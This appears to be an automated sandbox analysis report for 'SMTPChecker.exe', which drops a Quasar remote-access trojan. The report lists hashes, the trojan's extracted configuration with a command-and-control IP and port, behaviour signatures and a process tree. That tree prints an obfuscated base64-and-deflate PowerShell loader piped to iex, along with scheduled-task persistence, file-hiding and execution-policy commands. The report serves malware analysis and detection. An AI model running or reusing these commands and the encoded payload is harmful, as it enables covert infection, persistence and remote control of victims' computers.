Analysis
-
max time kernel
45s -
max time network
55s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2024 16:31
Static task
static1
Behavioral task
behavioral1
Sample
SMTPChecker.exe
Resource
win10v2004-20241007-en
General
-
Target
SMTPChecker.exe
-
Size
23.1MB
-
MD5
b2d4138a7cbb8b3e02d9f61c76f31f18
-
SHA1
629dfd6d138fe6a9ff0492a63ef1ce0bd5356c6c
-
SHA256
eabb7c5d04a447b6af835c375f9e5535fa1250f5ae976686048bf4bc9766612f
-
SHA512
f9cc089193c91f603f0ed6f47f84fa7483344268a88b2bfdaa8914e5e9f07af84ab206bd621272718eaca8a3babdceeaf58cd25197b24adfc0cede6f3933c988
-
SSDEEP
393216:ZSzcigXdH1z88oOJOVyRzVOrRS1/Q1NeJ42Mjck4GREfMfoPwY74HpC1P5aw:mVgc8hJO4wK/EdcsEfQobeM6
Malware Config
Extracted
quasar
1.4.0.0
Office
45.200.149.95:6669
6HcAGCOypVIi6hl6rR
-
encryption_key
3Fmq36RtzQkpmjAWxAFM
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
DISC
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4728-131-0x0000000000400000-0x000000000044E000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 19 2820 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
checkerdali.exepid Process 2660 checkerdali.exe -
Loads dropped DLL 19 IoCs
Processes:
checkerdali.exepid Process 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe 2660 checkerdali.exe -
Processes:
powershell.exepowershell.exepid Process 2820 powershell.exe 4376 powershell.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ifconfig.me 26 ip-api.com 15 ifconfig.me -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
SMTPChecker.exepid Process 732 SMTPChecker.exe 732 SMTPChecker.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 2820 set thread context of 4728 2820 powershell.exe 107 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 1832 2820 WerFault.exe 95 -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
installutil.exepowershell.execsc.execvtres.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language installutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
SMTPChecker.exepowershell.exepowershell.exepid Process 732 SMTPChecker.exe 732 SMTPChecker.exe 4376 powershell.exe 4376 powershell.exe 2820 powershell.exe 4376 powershell.exe 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeinstallutil.exedescription pid Process Token: SeDebugPrivilege 4376 powershell.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 4728 installutil.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
installutil.exepid Process 4728 installutil.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
SMTPChecker.execheckerdali.execmd.execmd.execmd.execmd.exepowershell.execsc.exedescription pid Process procid_target PID 732 wrote to memory of 2660 732 SMTPChecker.exe 84 PID 732 wrote to memory of 2660 732 SMTPChecker.exe 84 PID 2660 wrote to memory of 4464 2660 checkerdali.exe 87 PID 2660 wrote to memory of 4464 2660 checkerdali.exe 87 PID 4464 wrote to memory of 4152 4464 cmd.exe 88 PID 4464 wrote to memory of 4152 4464 cmd.exe 88 PID 2660 wrote to memory of 4892 2660 checkerdali.exe 89 PID 2660 wrote to memory of 4892 2660 checkerdali.exe 89 PID 4892 wrote to memory of 3140 4892 cmd.exe 90 PID 4892 wrote to memory of 3140 4892 cmd.exe 90 PID 2660 wrote to memory of 972 2660 checkerdali.exe 91 PID 2660 wrote to memory of 972 2660 checkerdali.exe 91 PID 2660 wrote to memory of 3968 2660 checkerdali.exe 92 PID 2660 wrote to memory of 3968 2660 checkerdali.exe 92 PID 972 wrote to memory of 3560 972 cmd.exe 93 PID 972 wrote to memory of 3560 972 cmd.exe 93 PID 972 wrote to memory of 4376 972 cmd.exe 94 PID 972 wrote to memory of 4376 972 cmd.exe 94 PID 3968 wrote to memory of 2820 3968 cmd.exe 95 PID 3968 wrote to memory of 2820 3968 cmd.exe 95 PID 3968 wrote to memory of 2820 3968 cmd.exe 95 PID 2820 wrote to memory of 1432 2820 powershell.exe 100 PID 2820 wrote to memory of 1432 2820 powershell.exe 100 PID 2820 wrote to memory of 1432 2820 powershell.exe 100 PID 1432 wrote to memory of 4112 1432 csc.exe 101 PID 1432 wrote to memory of 4112 1432 csc.exe 101 PID 1432 wrote to memory of 4112 1432 csc.exe 101 PID 2820 wrote to memory of 4728 2820 powershell.exe 107 PID 2820 wrote to memory of 4728 2820 powershell.exe 107 PID 2820 wrote to memory of 4728 2820 powershell.exe 107 PID 2820 wrote to memory of 4728 2820 powershell.exe 107 PID 2820 wrote to memory of 4728 2820 powershell.exe 107 PID 2820 wrote to memory of 4728 2820 powershell.exe 107 PID 2820 wrote to memory of 4728 2820 powershell.exe 107 PID 2820 wrote to memory of 4728 2820 powershell.exe 107 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\SMTPChecker.exe"C:\Users\Admin\AppData\Local\Temp\SMTPChecker.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Users\Admin\AppData\Local\Temp\onefile_732_133768531653620698\checkerdali.exeC:\Users\Admin\AppData\Local\Temp\SMTPChecker.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"4⤵
- Views/modifies file attributes
PID:4152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs" > NUL 2>&1"3⤵
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\system32\schtasks.exeschtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd /C echo Y|powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser"3⤵
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\system32\cmd.execmd /C echo Y4⤵PID:3560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBJect iO.ComPreSsION.DeFLATestrEAm( [Io.mEmOryStreAm] [SYstem.CoNVeRt]::FRoMBASE64stRiNG('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') , [sYstEm.iO.coMPREssIOn.cOmPREssioNMoDE]::dEComprEss) | FoReach { NEW-oBJect iO.sTrEAMREaDEr($_, [teXt.EnCoDInG]::AScII)} ).rEadtoEnd( ) | &( $Env:Comspec[4,15,25]-Join'')""3⤵
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBJect iO.ComPreSsION.DeFLATestrEAm( [Io.mEmOryStreAm] [SYstem.CoNVeRt]::FRoMBASE64stRiNG('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') , [sYstEm.iO.coMPREssIOn.cOmPREssioNMoDE]::dEComprEss) | FoReach { NEW-oBJect iO.sTrEAMREaDEr($_, [teXt.EnCoDInG]::AScII)} ).rEadtoEnd( ) | &( $Env:Comspec[4,15,25]-Join'')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b3trqxfj\b3trqxfj.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB45C.tmp" "c:\Users\Admin\AppData\Local\Temp\b3trqxfj\CSCFA0B2D2A6540490EACDC6D7E82403AF1.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:4112
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 13805⤵
- Program crash
PID:1832
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2820 -ip 28201⤵PID:788
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
Filesize
63KB
MD5f495d1897a1b52a2b15c20dcecb84b47
SHA18cb65590a8815bda58c86613b6386b5982d9ec3f
SHA256e47e76d70d508b62924fe480f30e615b12fdd7745c0aac68a2cddabd07b692ae
SHA512725d408892887bebd5bcf040a0ecc6a4e4b608815b9dea5b6f7b95c812715f82079896df33b0830c9f787ffe149b8182e529bb1f78aadd89df264cf8853ee4c4
-
Filesize
285KB
MD5d3e74c9d33719c8ab162baa4ae743b27
SHA1ee32f2ccd4bc56ca68441a02bf33e32dc6205c2b
SHA2567a347ca8fef6e29f82b6e4785355a6635c17fa755e0940f65f15aa8fc7bd7f92
SHA512e0fb35d6901a6debbf48a0655e2aa1040700eb5166e732ae2617e89ef5e6869e8ddd5c7875fa83f31d447d4abc3db14bffd29600c9af725d9b03f03363469b4c
-
Filesize
771KB
MD5bfc834bb2310ddf01be9ad9cff7c2a41
SHA1fb1d601b4fcb29ff1b13b0d2ed7119bd0472205c
SHA25641ad1a04ca27a7959579e87fbbda87c93099616a64a0e66260c983381c5570d1
SHA5126af473c7c0997f2847ebe7cee8ef67cd682dee41720d4f268964330b449ba71398fda8954524f9a97cc4cdf9893b8bdc7a1cf40e9e45a73f4f35a37f31c6a9c3
-
Filesize
1KB
MD59bc793807f19b34e9df4c7d144bd5e94
SHA1fd000b87fa38c82526913da28873dab91e1fe02f
SHA2567d72911541d51899dd6a3ce2b3c4bcf2be0b21c8722ebb384600a5229659aabe
SHA51202a3aeeb77b1a8a796b1cf49c3f1044ddba7ebca210062ee8eb3aa644bee6b1007364984ba44fb12c99ddcb6e2d39d72d7f76c2d05bb389f52501b79fac4284d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD5c0831742ca5ce3dd97aa2ca0b6d4e17a
SHA130e18d1529d2ce3d0ea4dacfebeeca7f06c41e92
SHA2569b044b0f3224b82896dacc7c52bb232b1b3e82f5e8b2e0816bea8968de4ceb4b
SHA512e6a2ceb4ac994f1ff3e72b0e04c4e01947c8d8b87398fc867d92037d9c43a8663a29bb2fc0c08780cb1b299ac23f213b8e903524cee96343059bc5aea1beade7
-
Filesize
82KB
MD5c7ce973f261f698e3db148ccad057c96
SHA159809fd48e8597a73211c5df64c7292c5d120a10
SHA25602d772c03704fe243c8de2672c210a5804d075c1f75e738d6130a173d08dfcde
SHA512a924750b1825747a622eef93331fd764d824c954297e37e8dc93a450c11aa7ab3ad7c3b823b11656b86e64de3cd5d409fda15db472488dfaa4bb50341f0b29d1
-
Filesize
121KB
MD510fdcf63d1c3c3b7e5861fbb04d64557
SHA11aa153efec4f583643046618b60e495b6e03b3d7
SHA256bc3b83d2dc9e2f0e6386ed952384c6cf48f6eed51129a50dfd5ef6cbbc0a8fb3
SHA512dc702f4100ed835e198507cd06fa5389a063d4600fc08be780690d729ab62114fd5e5b201d511b5832c14e90a5975ed574fc96edb5a9ab9eb83f607c7a712c7f
-
Filesize
155KB
MD54e2239ece266230ecb231b306adde070
SHA1e807a078b71c660db10a27315e761872ffd01443
SHA25634130d8abe27586ee315262d69af4e27429b7eab1f3131ea375c2bb62cf094be
SHA51286e6a1eab3529e600dd5caab6103e34b0f618d67322a5ecf1b80839faa028150c492a5cf865a2292cc8584fba008955da81a50b92301583424401d249c5f1401
-
Filesize
31KB
MD56e00e0821bb519333ccfd4e61a83cb38
SHA13550a41bb2ea54f456940c4d1940acab36815949
SHA2562ad02d49691a629f038f48fcdee46a07c4fcc2cb0620086e7b09ac11915ae6b7
SHA512c3f8332c10b58f30e292676b48ecf1860c5ef9546367b87e90789f960c91eae4d462dd3ee9cb14f603b9086e81b6701aab56da5b635b22db1e758ed0a983e562
-
Filesize
81KB
MD5899380b2d48df53414b974e11bb711e3
SHA1f1d11f7e970a7cd476e739243f8f197fcb3ad590
SHA256b38e66e6ee413e5955ef03d619cadd40fca8be035b43093d2342b6f3739e883e
SHA5127426ca5e7a404b9628e2966dae544f3e8310c697145567b361825dc0b5c6cd87f2caf567def8cd19e73d68643f2f38c08ff4ff0bb0a459c853f241b8fdf40024
-
Filesize
173KB
MD59b4e74fd1de0f8a197e4aa1e16749186
SHA1833179b49eb27c9474b5189f59ed7ecf0e6dc9ea
SHA256a4ce52a9e0daddbbe7a539d1a7eda787494f2173ddcc92a3faf43b7cf597452b
SHA512ae72b39cb47a859d07a1ee3e73de655678fe809c5c17ffd90797b5985924ddb47ceb5ebe896e50216fb445526c4cbb95e276e5f3810035b50e4604363eb61cd4
-
Filesize
24KB
MD53c8737723a903b08d5d718336900fd8c
SHA12ad2d0d50f6b52291e59503222b665b1823b0838
SHA256bb418e91e543c998d11f9e65fd2a4899b09407ff386e059a88fe2a16aed2556b
SHA5121d974ec1c96e884f30f4925cc9a03fb5af78687a267dec0d1582b5d7561d251fb733cf733e0cc00faee86f0fef6f73d36a348f3461c6d34b0238a75f69320d10
-
Filesize
35KB
MD5ee33f4c8d17d17ad62925e85097b0109
SHA18c4a03531cf3dbfe6f378fdab9699d51e7888796
SHA25679adca5037d9145309d3bd19f7a26f7bb7da716ee86e01073c6f2a9681e33dad
SHA51260b0705a371ad2985db54a91f0e904eea502108663ea3c3fb18ed54671be1932f4f03e8e3fd687a857a5e3500545377b036276c69e821a7d6116b327f5b3d5c1
-
Filesize
10KB
MD5d9e0217a89d9b9d1d778f7e197e0c191
SHA1ec692661fcc0b89e0c3bde1773a6168d285b4f0d
SHA256ecf12e2c0a00c0ed4e2343ea956d78eed55e5a36ba49773633b2dfe7b04335c0
SHA5123b788ac88c1f2d682c1721c61d223a529697c7e43280686b914467b3b39e7d6debaff4c0e2f42e9dddb28b522f37cb5a3011e91c66d911609c63509f9228133d
-
Filesize
120KB
MD5bf9a9da1cf3c98346002648c3eae6dcf
SHA1db16c09fdc1722631a7a9c465bfe173d94eb5d8b
SHA2564107b1d6f11d842074a9f21323290bbe97e8eed4aa778fbc348ee09cc4fa4637
SHA5127371407d12e632fc8fb031393838d36e6a1fe1e978ced36ff750d84e183cde6dd20f75074f4597742c9f8d6f87af12794c589d596a81b920c6c62ee2ba2e5654
-
Filesize
10.2MB
MD54500a38912953ac4ab5b5f6e72977939
SHA19c5e446f82af0dd0b0d75355df42996e79b0abe1
SHA25629d7034c8d6af42e7859d5026d3905aa9b28c07b2efe0bc89818c9ad0a3fcc41
